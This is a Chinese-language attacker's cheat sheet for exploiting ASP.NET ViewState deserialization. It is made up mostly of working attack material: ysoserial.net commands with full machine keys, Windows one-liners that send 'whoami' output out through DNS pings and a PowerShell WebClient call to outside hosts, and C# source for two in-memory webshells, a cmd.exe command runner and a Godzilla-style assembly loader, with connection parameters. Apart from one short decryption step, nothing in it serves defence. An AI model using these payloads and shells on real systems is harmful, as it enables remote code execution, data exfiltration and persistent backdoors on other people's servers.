C-Sharp ViewState Deserialization

.Net 之殇 ViewState 反序列化

viewState 利用简记

检测:

  1. AspDotNetWrapper

    1
    2
    #对应修改encrypteddata 为__VIEWSTATE的值  __modifier= __VIEWSTATEGENERATOR的值
    AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwULLTIxMzM5NTgzMTIPZBYCAgMPZBYCAgcPFgQeBWNsYXNzBSRhbGVydCBhbGVydC1kYW5nZXIgYWxlcnQtZGlzbWlzc2libGUeB1Zpc2libGVoFgICAQ8PFgIeBFRleHRlZGRkMixFMklGXEdmkdXJ2/H8ZhUck/M= --decrypt --purpose=viewstate --modifier=C2EE9ABB --macdecode

    image

利用:

  1. Ysoserial.net

    1
    2
    #修改generator validationkey
    ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll" --generator=C2EE9ABB --validationalg="SHA1" --validationkey="2EEA416CEFC6D6BE856ED57B97FB9CA7DFACE17C073125949A1D682C80A44BB2AD887DDDC13DBFB0954F1000FEE5757E99693F222F8E28CAA2E6DAB8C4F99E0C"

  2. Poc

    如果目标出网的话,windows 可通过 dnslog 外带命令执行结果

    1
    ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "for /F ""delims=\ tokens=2"" %i in ('whoami') do ping -n 1 %i.n2tmg3.dnslog.com" --path="/Login.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="8A3AD1DD400FF3A09F3F5CB27C0411D2E8C7792CE523FD7B" --validationalg="SHA1" --validationkey="52B3217F9A9F7B8CE24DEFBD3EDF2B698E37B2ADE33257FAD329A242C11579D0EEDDB67F94CCF27143DCA4BBF9667DDAE78EBEDDD9EABB7C7AB874B5EC443954" --generator=C2EE9ABB
    1
    for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.com
    1
    for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('xxx.com/api/get?'+$a);

  3. 内存马

    命令执行

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    class E
    {
        public E()
        {
            System.Web.HttpContext context = System.Web.HttpContext.Current;
            context.Server.ClearError();
            context.Response.Clear();
            try
            {
                System.Diagnostics.Process process = new System.Diagnostics.Process();
                process.StartInfo.FileName = "cmd.exe";
                string cmd = context.Request.Form["cmd"];
                process.StartInfo.Arguments = "/c " + cmd;
                process.StartInfo.RedirectStandardOutput = true;
                process.StartInfo.RedirectStandardError = true;
                process.StartInfo.UseShellExecute = false;
                process.Start();
                string output = process.StandardOutput.ReadToEnd();
                context.Response.Write(output);
            } catch (System.Exception) {}
            context.Response.Flush();
            context.Response.End();
        }
    }
    1
    ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll" --path="/Login.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="8A3AD1DD400FF3A09F3F5CB27C0411D2E8C7792CE523FD7B" --validationalg="SHA1" --validationkey="52B3217F9A9F7B8CE24DEFBD3EDF2B698E37B2ADE33257FAD329A242C11579D0EEDDB67F94CCF27143DCA4BBF9667DDAE78EBEDDD9EABB7C7AB874B5EC443954" --generator=C2EE9ABB

    哥斯拉

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    class E
    {
        public E()
        {
            System.Web.HttpContext Context = System.Web.HttpContext.Current;
            Context.Server.ClearError();
            Context.Response.Clear();
            try
            {
                string key = "3c6e0b8a9c15224a";
                string pass = "pas";
                string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");
                byte[] data = System.Convert.FromBase64String(Context.Request[pass]);
                data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);
                if (Context.Session["payload"] == null)
                {
                    Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });
                }
                else
                {
                    System.IO.MemoryStream outStream = new System.IO.MemoryStream();
                    object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");
                    o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();
                    byte[] r = outStream.ToArray();
                    Context.Response.Write(md5.Substring(0, 16));
                    Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));
                }
            }
            catch (System.Exception) { }
            Context.Response.Flush();
            Context.Response.End();
        }
    }

    连接方式

    1
    2
    3
    4
    5
    6
    pas
    key


    left data
    __VIEWSTATE=<yso生成的内容>&__VIEWSTATEGENERATOR=60AF4XXX&

    .Net 高版本. DisableTypeCheck

    1
    ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck -c "ignore" --path="/Login.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="8A3AD1DD400FF3A09F3F5CB27C0411D2E8C7792CE523FD7B" --validationalg="SHA1" --validationkey="52B3217F9A9F7B8CE24DEFBD3EDF2B698E37B2ADE33257FAD329A242C11579D0EEDDB67F94CCF27143DCA4BBF9667DDAE78EBEDDD9EABB7C7AB874B5EC443954" --generator=C2EE9ABB